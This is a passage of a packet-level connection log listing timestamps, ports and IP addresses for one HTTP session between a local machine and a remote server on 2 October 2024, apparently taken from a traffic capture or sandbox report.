Oct 2, 2024 23:10:12.945873976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.945883036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.945892096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.945903063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.945904970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.945911884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.945935965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.945952892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.946810007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.946821928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.946830988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.946841002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.946850061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.946860075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.946866035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.946870089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.946885109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.946903944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.947805882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.947815895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.947824955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.947834969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.947844028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.947854042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.947859049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.947879076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.947894096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.948738098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.948749065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.948756933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.948765993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.948775053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.948785067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.948786974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.948793888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.948827982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.948837996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.949481964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.949493885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.949502945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.949507952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.949516058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.949526072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.949533939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.949536085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.949549913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.949553013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.949579000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.949595928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.950380087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.950392962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.950401068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.950411081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.950419903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.950428963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.950433969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.950438976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.950448036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.950468063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.950486898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.951276064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.951287031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.951296091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.951306105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.951314926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.951323986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.951330900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.951333046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.951343060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.951350927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.951369047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.951378107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.952164888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.952177048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.952186108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.952194929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.952203989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.952214956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.952219963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.952224970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.952234983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.952250004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.952269077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.953063965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953075886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953083992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953094006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953105927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953115940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.953119040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953128099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953134060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.953154087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.953166008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.953946114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953958035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953965902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953975916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953984976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.953994036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954000950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.954004049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954013109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954030037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.954044104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.954898119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954909086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954916954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954926014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954935074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954945087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954951048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.954953909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954963923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:12.954972029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.954989910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:12.955003023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.028018951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028114080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028127909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028204918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.028228998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.028268099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028311968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.028337955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028348923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028358936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028371096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028402090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.028681040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.028882980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028892994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028903008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028913021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.028945923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.028956890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.029306889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029326916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029362917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.029380083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.029566050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029576063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029586077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029594898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029606104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029616117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029618979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.029627085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029635906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029647112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.029647112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.029666901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.029685020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.030457020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.030467987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.030478001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.030488014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.030498028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.030520916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.030520916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.030539989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.031585932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031598091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031606913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031615973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031625986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031636953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031640053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.031646967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031660080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031670094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.031691074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.031706095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.031728029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031738997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031773090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.031847000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031857967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031866074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031876087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031886101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031894922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.031897068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031905890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.031915903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.031934023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.031943083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.032768965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.032779932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.032788038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.032798052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.032809019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.032819033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.032826900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.032830000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.032840014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.032850981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.032855988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.032879114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.032893896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.033675909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.033689022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.033699036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.033709049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.033719063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.033730030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.033734083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.033740044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.033750057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.033763885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.033783913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.033793926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.034589052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.034601927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.034611940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.034621954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.034631014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.034641981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.034641981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.034662008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.034672976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.034672976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.034686089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.034713984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.035336971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035348892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035357952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035367966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035377979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035393000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.035393953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035403967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035404921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.035414934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035423994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.035425901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035437107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035446882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.035458088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.035481930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.035495996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.036290884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036303997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036312103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036322117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036333084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036343098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036345959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.036353111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036361933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036370993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036375046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.036381960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036387920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.036392927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.036412001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.036423922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.037225008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037236929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037245035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037254095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037262917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037272930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037280083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.037282944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037292004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037297010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.037302017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037312031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037314892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.037321091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.037336111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.037354946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.038168907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038180113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038187981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038197994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038206100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038216114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038222075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.038225889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038235903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038242102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.038244963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038254976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.038261890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.038275957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.038296938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.039005995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.039017916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.039026976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.039036036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.039061069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.039076090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.114552021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.114562035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.114576101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.114589930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.114599943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.114609003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.114736080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.114736080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.114795923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.114808083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.114816904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.114842892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.114854097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.115029097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115040064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115080118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.115092039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115103960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115112066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115120888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115134001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.115159035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.115624905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115633011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115677118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.115818024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115828991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115838051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115845919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115856886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115864992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115865946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.115874052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.115885019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.115896940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.115910053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:13.116338015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.116348028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:13.116355896 CEST	80	49704	185.215.113.37	192.168.2.5
